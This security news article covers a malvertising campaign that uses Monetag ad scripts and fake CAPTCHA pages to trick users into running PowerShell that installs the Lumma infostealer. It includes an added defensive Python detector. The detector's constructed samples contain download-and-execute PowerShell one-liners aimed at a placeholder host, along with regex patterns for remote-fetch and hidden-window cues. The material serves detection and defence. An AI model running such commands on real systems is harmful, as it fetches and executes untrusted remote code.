Malvertising on steroids serves Lumma infostealer


A large-scale malvertising campaign distributing the Lumma infostealer malware via intrusive “ads” leading to fake CAPTCHA pages has been tied by researchers to a threat actor abusing the Monetag ad network.

The campaign from the users’ perspective

Internet users usually land on one of the many thousands of SEO-optimized sites running Monetag ad-zone scripts after searching for things like streaming videos, anime, sports, academic documents, and similar content.

The scripts pop open a new tab, which redirects users to a fake CAPTCHA page that instructs them to verify that they are human by pressing a set of buttons in a specific order.

That key sequence opens the Windows Run dialog, pastes the PowerShell script the page has already placed on the clipboard, and executes it when the victim, still believing they are completing a CAPTCHA, presses OK.

“The malicious pages are frequently updated with new variants to evade detection. Those use different PowerShell one-liners, different script obfuscation to copy the PowerShell script to the clipboard, as well as changes in visual design,” Guardio Labs researchers discovered.

The PowerShell scripts download and execute the powerful Lumma infostealer, just as in previously flagged campaigns (which may or may not be one stage of the campaign documented by Guardio).
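The infection chain described above leaves two defender-visible traces: a PowerShell process whose parent is the interactive shell (explorer.exe, which is how a Run-dialog launch appears in process-creation telemetry) with download-and-execute arguments, and the command text itself in the user's RunMRU registry key, where Windows remembers what was typed into the Run dialog. The script below is an added example written for this article, not Guardio's or Infoblox's code; the event field names follow Sysmon event 1 conventions, the cue names and thresholds are this example's own choices, and every event and registry value in it is constructed.

```python
"""Added example: flag Run-dialog PowerShell launches with download-and-execute cues.

Check 1 scores process-creation records (Sysmon event 1 style fields).
Check 2 scans RunMRU values exported from
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU.
All sample events and registry values are constructed for this example.
"""
import re

# Cue patterns (case-insensitive). The names are this example's own labels.
CUES = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "remote_fetch": re.compile(
        r"\b(?:irm|iwr|Invoke-RestMethod|Invoke-WebRequest|DownloadString|Net\.WebClient)\b", re.I),
    "inmemory_exec": re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I),
    "encoded_cmd": re.compile(r"-e(?:nc|ncodedcommand)?\b\s+[A-Za-z0-9+/=]{20,}", re.I),
    "policy_bypass": re.compile(r"-e(?:xecution)?p(?:olicy)?\s+bypass", re.I),
}
POWERSHELL = re.compile(r"\\(?:powershell|pwsh)\.exe$", re.I)
EXPLORER = re.compile(r"\\explorer\.exe$", re.I)
# Cues that on their own indicate fetch-and-run behaviour; the others only add context.
STRONG = {"remote_fetch", "inmemory_exec", "encoded_cmd"}

# Constructed process-creation records, not real telemetry.
SAMPLE_EVENTS = [
    # 1: what a victim following the fake-CAPTCHA "verification" steps produces
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iex (irm https://example.invalid/v)"'},
    # 2: same cues, but launched by a management agent rather than the interactive shell
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\MgmtAgent\agent.exe",
     "CommandLine": 'powershell -ep bypass -c "iex (iwr https://example.invalid/cfg)"'},
    # 3: interactive launch with a harmless command line
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -NoProfile -c Get-Date"},
    # 4: not PowerShell at all
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

# Constructed RunMRU export: one-letter value names, data ending in "\1",
# MRUList holding the letters most-recent-first.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": r"calc\1",
    "b": r"mmc.exe\1",
    "c": r"powershell -w hidden -ep bypass -c iex(irm https://example.invalid/v)\1",
}


def cues_in(command_line):
    """Return the sorted names of the cue patterns present in a command line."""
    return sorted(name for name, rx in CUES.items() if rx.search(command_line))


def assess_process_event(event):
    """Score one process-creation record.

    Rule: PowerShell, spawned by explorer.exe, with at least one strong cue.
    An explorer.exe parent alone is benign (any double-clicked script looks
    like that), so it is reported as a reason but never flags by itself.
    """
    reasons = []
    if not POWERSHELL.search(event.get("Image", "")):
        return {"suspicious": False, "reasons": reasons}
    found = cues_in(event.get("CommandLine", ""))
    reasons.extend(found)
    run_dialog_like = bool(EXPLORER.search(event.get("ParentImage", "")))
    if run_dialog_like:
        reasons.append("parent_explorer")
    return {"suspicious": run_dialog_like and bool(STRONG & set(found)),
            "reasons": reasons}


def scan_runmru(values):
    """Return RunMRU entries carrying a strong cue, most recent first."""
    hits = []
    for letter in values.get("MRUList", ""):
        data = values.get(letter, "")
        if data.endswith("\\1"):          # strip the trailing "\1" Windows appends
            data = data[:-2]
        found = cues_in(data)
        if STRONG & set(found):
            hits.append({"slot": letter, "command": data, "cues": found})
    return hits


def run_demo():
    """Run both checks over the constructed samples and return the verdicts."""
    return {"events": [assess_process_event(e) for e in SAMPLE_EVENTS],
            "runmru": scan_runmru(SAMPLE_RUNMRU)}


if __name__ == "__main__":
    result = run_demo()
    for i, verdict in enumerate(result["events"], 1):
        print(f"event {i}: suspicious={verdict['suspicious']} reasons={verdict['reasons']}")
    for hit in result["runmru"]:
        print(f"RunMRU slot {hit['slot']}: {hit['command']!r} cues={hit['cues']}")
```

Only event 1 and RunMRU slot c are flagged: event 2 carries the same cues but comes from a non-interactive parent, which a deployment tool legitimately produces, and event 3 shows that an explorer.exe parent by itself is not evidence. Because the article notes that the campaign rotates its PowerShell one-liners and obfuscation, the cue list is deliberately about behaviour (hidden window, remote fetch, in-memory execution, encoded or policy-bypassing invocation) rather than any specific string from a given variant.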

The campaign from the researchers’ perspective

“In collaboration with Infoblox and through meticulous deobfuscation of JavaScript snippets responsible for triggering ad events, we identified the ad network service responsible—Monetag. Monetag is a subsidiary of PropellerAds, a large ad network company based in Cyprus,” Guardio Labs researchers shared.

The ad network is being leveraged by a threat actor – previously dubbed “Vane Viper” by Infoblox researchers – to distribute malware at a large scale.

The threat actor is using obfuscated scripts, redirect chains, and ad-tracking services like BeMob to conceal their malicious pages and intent from the ad network’s moderators.

The malvertising attack flow (Source: Guardio Labs)

“Over just the past ten days, our analysis estimated up to 1M ‘ad impressions’ per day, arriving from around 3000+ publisher sites,” the researchers pointed out.

A concentrated effort is needed to protect internet users

The researchers have outlined the flawed ecosystem and buck-passing strategy that make campaigns such as these possible:

  • Ad networks supply ad scripts that essentially “hijack” sites (invasive pop-ups, obfuscated scripts that circumvent ad blockers, direct links that can be posted on social media or in instant messages, etc.), and claim they cannot moderate the “ads” because of cloaking
  • Publishers of SEO-optimized (cloned) sites with click-baity content – built from ready-to-deploy website templates or created with the help of specialized services (“Streaming As A Service”) – say they are just monetizing their websites via third-party services
  • Hosting services fail to promptly identify and take down malicious pages hosted on their infrastructure
  • Ad-tracking services say they are just an analytics tool and cannot be held responsible for the malicious ads.

“This fragmented chain of ownership creates a perfect storm of plausible deniability, making it exceptionally difficult to pinpoint and enforce accountability. It’s a system designed to shift blame while allowing malicious campaigns to thrive,” Guardio Labs says.

“Ad networks must prioritize ongoing content moderation, robust account validation to prevent fake registrations, and more accessible reporting mechanisms for the cybersecurity community. Waiting for external reports to address such abuses is not enough. These systems require continuous oversight to protect not just their clients but all internet users.”

Published by
Cybernoz